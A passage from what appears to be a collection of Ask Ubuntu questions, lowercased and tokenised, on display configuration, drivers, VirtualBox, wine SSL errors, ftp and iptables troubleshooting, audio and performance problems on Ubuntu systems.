[ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card1 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card2 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection does this mean that it sees 3 monitor ports ? i have tried to add the ppa of ubuntu-x-swat and xorg-edgers but there appears to be no updates . also the intel driver seems to be uptodate : dpkg -- list intel desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ ii intel-gpu-tool 1.0.2+git20100 tools for debugging the intel graphics drive ii libdrm-intel1 2.4.26-1ubuntu userspace interface to intel-specific kernel ii xserver-xorg-v 2:2.15.901-1ub x.org x server -- intel i8xx , i9xx display d
114595	resolution in login screen	last weekend i tried to personalize my ubuntu a bit and i was able to destroy it until i was only able to boot a terminal only : ( so i just reinstalled ubuntu . before im doing such a ** again ... i better ask for help : ) the problem : i have 2 screens . one screen of my laptop , my main screen with a resultuion of 1600x900 and another screen , a simple flat screen with a simple resolution of 1280x1024 . for me it looks like my login screen has a resolution of 1280x1024 and is copied on both screens . but that looks bad on my laptop so i wish there was a ppossibility of either get the korrect resolution on each screen nor let the monitor black until the login has finished but with the correct resolution for the main screen . hopefully you understood what i meant ... . regards timo
114600	how can i repair error when trying to access my home folder after installing compiz in xubuntu	i found that compiz is usable with xfce and after installing it , adding it to start with session and restarting session , i could n't access my home folder ( i have access to folders that are within 'home/user ' ) . i get this error message : error stating file 'home/user/.gvfs ' . transport endpoint is not connected . i unistalled compiz and still get the same error . how could i repair this ?
114605	switching to console mode in virtualbox distorts graphics	i 'm using virtualbox 4.1.2 on a windows host , and have ubuntu 11.10 oneiric installed . i can use the graphic mode normally , but when i try to use console model ( ctrl+alt+f1 , ctrl+alt+f2 ) a distorced screen is showed ( see the screenshot ) . thanks in advance
114609	game `` zen bound 2 '' from humble bundle does n't run	i bought the latest humble indie bundle and installed the 64-bit deb of zen bound 2 on my ubuntu 12.04 intel-based desktop system using ubuntu software centre by clicking the deb . nothing happens when i run the game from the dash , and when i run it from the terminal i get this : - alan @ wopr : ~ $ zenbound2 setting video head to 0 setting resolution 1920 , 1080 any ideas what to try next ?
114612	no display on boot with radeon hd6620g	i have an hp laptop with a radeon hd6620g . when i try to boot the live cd for 11.10 , i just get a black screen . i know ubuntu 's loading , because i can hear the startup sound . any ideas ?
114613	is compiz compatible with xfce ?	i tried it and immediately had a big problem ( here ) . also , could not use more than one workspace . it is said that they are compatible , that is : i can install compiz with xfce if i want to . but i enter a world of bugs , am i ? i would like more opinions , please .
114614	how do i install gnucap or octave ?	i have tried to install gnucap ( i downloaded it from the website http : //ftp.gnu.org/gnu/gnucap/ with the extension .tar.gz ) in the ubuntu live-usb . i have tried to do it in the terminal with : sudo apt-get install gnucap but the problem is that it always tell me : e : unable to locate package could someone tell me what should i do to install the software ?
114617	nvidia-settings not working properly	i posted a question before at dell monitor not detected ( ubuntu 11.10 ) but i figured it 's best to create a separate question since the real issue at hand is not really tied to my monitor and the info was previously all over the place . basically , i ca n't access nvidia-settings . if i try i get the following error : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . here is what my xorg.conf looked like : $ cat /etc/x11/xorg.conf.initial section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection so i tried to run nvidia-xconfig , but it failed with following error : $ sudo nvidia-xconfig [ sudo ] password for cmenguy : using x configuration file : `` /etc/x11/xorg.conf '' . validation error : data incomplete in file /etc/x11/xorg.conf . device section `` default device '' must have a driver line . backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.backup' new x configuration file written to '/etc/x11/xorg.conf' and here is what the new xorg.conf looks like : $ cat /etc/x11/xorg.conf.backup # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 280.13 ( buildmeister @ swio-display-x86-rhel47-05.nvidia.com ) wed jul 27 17:18:55 pdt 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection and i still get the same error with nvidia-settings ... my graphic card is a nvidia gf106 ( i got that from my lspci output ) : $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 6 series/c200 series chipset family kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b4 ) 00:1c.6 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 7 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm67 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf106 [ quadro 2000m ] ( rev a1 ) 03:00.0 network controller : intel corporation centrino ultimate-n 6300 ( rev 3e ) 0d:00.0 system peripheral : ricoh co ltd mmc/sd host controller ( rev 08 ) 0d:00.3 firewire ( ieee 1394 ) : ricoh co ltd firewire host controller ( rev 04 ) 0e:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) i 've also installed the latest available driver with additional driver and rebooted once . can someone tell me what i 'm doing wrong ? and can i reboot the pc with this new xorg.conf with no risk to be stuck with no graphical interface ? thanks !
114618	facebook username too long in pidgin	currently when chatting in pidgin my name that is displayed whenever i send a chat is too long and makes reading the chat difficult and sometimes confusing . is there a way to make the display name for all of the different protocols be something shorter like a nickname or something ? an example my facebook reads like this ( 01:14:16 pm ) username @ chat.facebook.com/df747fe6_4bbb0493f66ae : and i want it to look like this ( 01:14:16 pm ) username :
114619	ubuntu livecd customization : keep services stopped at startup	i 'm customizing ubuntu 11.10 livecd . i added apache , mysql ( and php ) , but the apache & mysql services start on ubuntu startup . i want to keep these services stopped ( users will have to launch them when needed ) . how to to so ? before rebuilding the iso image , i deleted startup script with update-rc.d , no success ! by the way , is there a gui for starting / stopping easily services ?
114621	accessing ssl site using ie7 and wine	i am trying to access a ie only site without using a vm . i installed ie7 and got it working on wine 1.5 . however , when i go to the site there is a problem with the certificate . if i click to continue anyway , nothing happens . is there a way to get around this ? i tried going to content > certificates but it will not accept the .p12 file i created . is there any way to get ssl browsing working using ie7 ? error log ... . err : comboex : comboex_windowproc unknown msg 200b wp=00000000 lp=0033d598 err : toolbar : toolbarwindowproc unknown msg 200b wp=00000000 lp=0033d390 err : rebar : rebar_windowproc unknown msg 200b wp=00000000 lp=7e2e2b88 fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : wininet : internetconfirmzonecrossingw ( 0x100de , l '' http : //localhost:8000/accelerator '' , l '' https : //localhost:8000/accelerator '' , 0 ) stub fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : ole : ndrcorrelationinitialize ( 0x101bf78 , 0x101bb78 , 1024 , 0x0 ) : stub fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x101bf78 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x101bf9c , 0x101bb9c , 1024 , 0x0 ) : stub fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x101bf9c ) : stub fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : wininet : internetsetoptionw internet_option_idn ; stub fixme : wininet : internetsetoptionw internet_option_send_utf8_servername_to_proxy ; stub fixme : wininet : internetsetoptionw option internet_option_codepage ( 65001 ) : stub fixme : wininet : internetsetoptionw internet_option_codepage_path ; stub fixme : wininet : internetsetoptionw internet_option_codepage_extra ; stub fixme : wininet : internetsetoptionw internet_option_cookies_3rd_party ; stub fixme : wininet : internetsetoptionw option internet_option_request_priority ( 0 ) : stub fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) err : wininet : netcon_secure_connect ssl_connect failed : 12045 fixme : wininet : query_global_option stub for 98 fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : ole : ndrcorrelationinitialize ( 0x101cd0c , 0x101c90c , 1024 , 0x0 ) : stub fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x101cd0c ) : stub fixme : ole : ndrcorrelationinitialize ( 0x101cd30 , 0x101c930 , 1024 , 0x0 ) : stub fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x101cd30 ) : stub fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : apphelp : apphelpcheckshellobject stub : { 9ba05972-f6a8-11cf-a442-00a0c90a8f39 } 0x101e510 fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : apphelp : apphelpcheckshellobject stub : { a4741943-6c4b-4cf7-bf44-a0f4207d1330 } 0x33b238 fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : apphelp : apphelpcheckshellobject stub : { a4741943-6c4b-4cf7-bf44-a0f4207d1330 } 0x33b050 fixme : apphelp : apphelpcheckshellobject stub : { a4741943-6c4b-4cf7-bf44-a0f4207d1330 } 0x33b050 fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! err : ole : cogetclassobject class { 6c736db1-bd94-11d0-8a23-00aa00b58e10 } not registered err : ole : cogetclassobject no class object { 6c736db1-bd94-11d0-8a23-00aa00b58e10 } could be created for context 0x1 fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : geturlcacheentryinfoexw undocumented flag ( s ) : 100 fixme : wininet : geturlcacheentryinfoexw undocumented flag ( s ) : 100 fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : ole : ndrcorrelationinitialize ( 0x101d01c , 0x101cc1c , 1024 , 0x0 ) : stub fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x101d01c ) : stub fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : wininet : geturlcacheentryinfoexw undocumented flag ( s ) : 100 err : ole : marshal_object could n't get ipsfactory buffer for interface { 1ec4f3c6-2fec-4f6e-b4c2-727668522c3a } err : ole : clientidentity_querymultipleinterfaces iremunknown_remqueryinterface failed with error 0x80004002 fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : shell : dllgetclassobject failed for clsid= { 871c5380-42a0-1069-a2ea-08002b30309d } ( internet ) fixme : ole : ndrcorrelationinitialize ( 0x33e564 , 0x33e164 , 1024 , 0x0 ) : stub fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x33e564 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x33e560 , 0x33e160 , 1024 , 0x0 ) : stub fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x33e560 ) : stub fixme : ole : ndrcorrelationinitialize ( 0x33e560 , 0x33e160 , 1024 , 0x0 ) : stub fixme : rpc : ndrstubcall2 new correlation description not implemented fixme : ole : ndrcorrelationfree ( 0x33e560 ) : stub err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : tooltips : tooltips_windowproc unknown msg 2007 wp=00000005 lp=00000000 err : comboex : comboex_windowproc unknown msg 200b wp=00000000 lp=0033d6a8 err : toolbar : toolbarwindowproc unknown msg 200b wp=00000000 lp=0033d4a0 err : rebar : rebar_windowproc unknown msg 200b wp=00000000 lp=7e2e2b88
114623	how can i make sure/test that my notebook build-in video/camera on top of the display is n't recording ?	i just want to remove the duck-tape from it to fix this insecurity . shell commands are welcome , too . ; )
114625	how to change ownership for an external hdd ?	i 've got an external hdd ( 640 gb ) , with file system fat32 . i want to change the ownership of it from root ( default ) to angstrem ( my username ) . the system is mounted to /media/exthdd . i try to do that by a command : sudo chown -vr angstrem : angstrem /media/exthdd and after that the system gives me an error : chown : changing ownership of `/media/exthdd ' : operation not permitted if anybody knows , please tell me , how to change ownership of that hdd ?
114626	can ubuntu be installed in virtualbox in ubuntu ?	i am using virtualbox to set up a copy of ubuntu for experimenting . i want it this way so that i can have a virtual/permanent copy of ubuntu . i am at the stage where i need to decided where to put the virtual ubuntu . it lists the virtualbox for boot and lists one option for the actual os . is that one option the virtual box too ?
114633	can not ftp without simultaneous ssh connection ?	i 'm trying to set up an old box as a backup server ( running 10.04.4 lts ) . i intend to use 3rd party software on my pc to periodically connect to my server via ftp ( s ) and to mirror certain files . for some reason , all ftp connection attempts fail unless i 'm simultaneously connected via ssh . for example , if i use putty to test the connection to port 21 , the system hangs and times out . i get : 220 connected to leserver user lucas 331 please specify the password . pass [ password ] < cursor > however , when i 'm simultaneously logged in ( in another session ) everything works : 220 connected to leserver user lucas 331 please specify the password . pass [ password ] 230 login successful . basically , this means that my software will never be able to connect on its own , as intended . i know that the correct port is open because it works ( sometimes ) and nmap gives me : starting nmap 5.00 ( http : //nmap.org ) at 2012-03-20 16:15 cdt interesting ports on xx.xxx.xx.x : not shown : 995 closed ports port state service 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 139/tcp open netbios-ssn 445/tcp open microsoft-ds nmap done : 1 ip address ( 1 host up ) scanned in 0.15 seconds my only hypothesis is that this has something to do with iptables . maybe it 's allowing only established connections ? i do n't think that 's how i set it up , but maybe ? here 's my iptables rules for input : lucas @ rearden : ~ $ sudo iptables -l input chain input ( policy drop ) target prot opt source destination fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh ufw-before-logging-input all -- anywhere anywhere ufw-before-input all -- anywhere anywhere ufw-after-input all -- anywhere anywhere ufw-after-logging-input all -- anywhere anywhere ufw-reject-input all -- anywhere anywhere ufw-track-input all -- anywhere anywhere accept tcp -- anywhere anywhere tcp dpt : ftp i 'm using vsftpd . any thoughts/resources on how i could fix this ? l
114639	cpu spikes cause audio stuttering in audacious when browsing ? ( lubuntu )	my default audio player is audacious , browser google chrome . i tried firefox , and while i love it , the cpu load spikes when doing something as simple and small and switching a tab , which causes the audio playing to stutter ( as sound is onboard and handled thru the cpu ) . chrome does n't do this as much , but there is the occasional stuttering when browsing , which is ridiculous , as not even windows vista does this . so i thought maybe it 's something to do with how lubuntu handles sound , i checked and only alsa was installed . i tried installing pulseaudio , but , while the music `` plays '' , nothing comes through the speakers . immediately after switching back to alsa the music pours out of them . so i was wondering if you had any idea what was going on here . i asked on ubuntu forums but apparently my problem is too complex , as it 's been over a week since the last reply . specs are : amd athlon 64 3200+ @ 2ghz 2gb corsair 667mhz ddr2 ram ati hd radeon 3650 ( agp ) 512mb 500w cooler master psu 80gb sata ii hdd ( vista is installed on 500gb drive ) biostar k8m800 motherboard
114643	is there a way to learn which files in the installed system are changed/updated during a kernel update ?	is there a way to find out which files in the installed system are changed/updated during a kernel update/upgrade ?
114644	windows7 in virtualbox , does this mean i can use windows software ?	now , my problem is that there are loads of things that i can not use with wine . can i just install windows7 in virtualbox and use those few basic software ( trade manager , nokia 5800 pc suite ) that i really need ?
114645	how do i remove rounded borders in gnome shell ?	is there a way i can remove the rounded borders on the top left and right corners of windows on gnome shell ? how can i do it ?
114651	hide launcher when switching workspaces	when i switch to another workspace , the launch bar on the left will automatically appear , this really annoys me . how do i disable the automatic display of the launch bar after switching workspaces ?
114655	dash home not working	forgive my stupid question , but i just ca n't seem to get this working . upgraded to 11.10 , but now when i click on dash home , the launcher goes translucent , but nothing else happens -- no applications , no search pane , not even a blank dash home window . can anyone help ? also , what is `` daemon ? '' like i said -- stupid questions . any help is greatly appreciated .
114658	invisible boundary on synergy client	i have a desktop system ( named 'desktop ' ) with 2 monitors attached ( one 1680x1050 and another 1920x1080 resolution ) , running a synergy server . i also have a small itx machine ( named 'tiny ' ) to my right that has a single monitor running at 1280x1024 . the dual-monitor desktop is the synergy `` server '' and the single monitor system is the `` client '' . synergy works fine with one exception ; if i move the mouse to the client , i ca n't move my mouse below the top two-thirds of the screen - it just stops . i can grab a mouse attached to the computer , and it moves all the way down , but as soon as i touch the mouse attached to the server , it jumps back to the top of the screen . is there an issue with my config ? section : screens desktop : tiny : end section : links desktop : right = tiny tiny : left = desktop end thanks in advance for any suggestions . + -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | | | | | | | | + -- -- -- -- -- -- -- -- -+ | | | | | desktop 1680x1050 | desktop 1920x1080 | | | | | | | | | tiny 1280x1024 | | | |+ -- -- -- -- -- -- -- -+| | | |xxxxxxxxxxxxxxxxx| + -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -+
114665	how can i get kubuntu to use my multimedia keys ?	i have tried to get kubuntu to use my multimedia keys , and i can not figure out how to do this . this feature is default in ubuntu and in linux mint . they just work . i have followed the kubuntu wiki post on multimedia keys . i tried to enable multimedia maps with xmodmap . it did not work . i tried to use the kde gui and could not seem to make the function i wanted work . the functions i am trying to get to work are fn+f12 = skip song fn+f11 = previous song fn+f10 = stop fn+ f9 = play/pause . i know this is possible because it worked in ubuntu and in mint , but it does not work in kubuntu . i have submitted a bug report on this issue . disclaimer : i am using kubuntu 12.04 i have looked at this post , but is there a way to enable ubuntu keyboard shortcuts in kubuntu ? do not know what to call the keys in that program .
114675	an increase to 3 gig of ram slows down ubuntu 10.04 lts	i have ubuntu 10.04 running from an external hard drive ( installed on an enclosure ) connected via usb port . like a month or so ago , i increased ram on my pc from 2 gigs to 3 gigs . this resulted on extremely long boot times and slow application loads . while i was understanding the nature of my problem , i posted various threads on this forum ( questions # 188417 , 188801 ) , where i was advised to gather speed tests , and other info on my machine . i was also suggested that i might have problems with the ram installed . initially , i did not consider that possibility because : 1 ) i did a memory test with a diagnostic program from dell ( my pc is from dell ) 2 ) my pc works fine with windows xp ( the default os ) , no problems with memory 3 ) my pc works fine when booting with ubuntu 10.10 memory stick , no speed problems 4 ) my pc works fine when booting with ubuntu 11.10 memory stick , no speed problems anyway , i performed the memory tests suggested . but before doing it , and to check out any possibility of hardware issues on the hard drive , i did the following : ( 1 ) purchased a new hard drive enclosure and moved my hard drive to it , ( 2 ) purchased a new usb cable and used it to connect my hard drive/enclosure setup to a different usb port on my pc . then , i performed speed tests with 1 gig , 2 gigs and 3 gigs of ram with my ubuntu 10.04 os . ubuntu 10.04 worked well when booted with 1 gig or 2 gigs of ram . when i increased to 3 gigs , it slowed down to a crawl . i ca n't understand the relationship between an increase of 1 gig and the effect it has in ubuntu 10.04 . this does n't happen with ubuntu 10.10 and 11.10 . unfortunately for me , ubuntu 10.04 is my principal work operating system . so , i need a solution for this . hardware and system information : dell precision 670 2 internal sata hard drives audigy 2 zs audio system factory os : windows xp professional sp3 nvidia 8400 gts video card more info : williepabon @ wp-wrkstation : ~ $ uname -a linux wp-wrkstation 2.6.32-38-generic # 83-ubuntu smp wed jan 4 11:13:04 utc 2012 i686 gnu/linux williepabon @ wp-wrkstation : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid speed test with the 3 gigs of ram installed : williepabon @ wp-wrkstation : ~ $ sudo hdparm -tt /dev/sdc [ sudo ] password for williepabon : /dev/sdc : timing cached reads : 84 mb in 2.00 seconds = 41.96 mb/sec timing buffered disk reads : 4 mb in 3.81 seconds = 1.05 mb/sec this is a very slow transfer rate from a hard drive . i will really appreciate a solution or a work around for this problem . i know that that there are users that have ubuntu 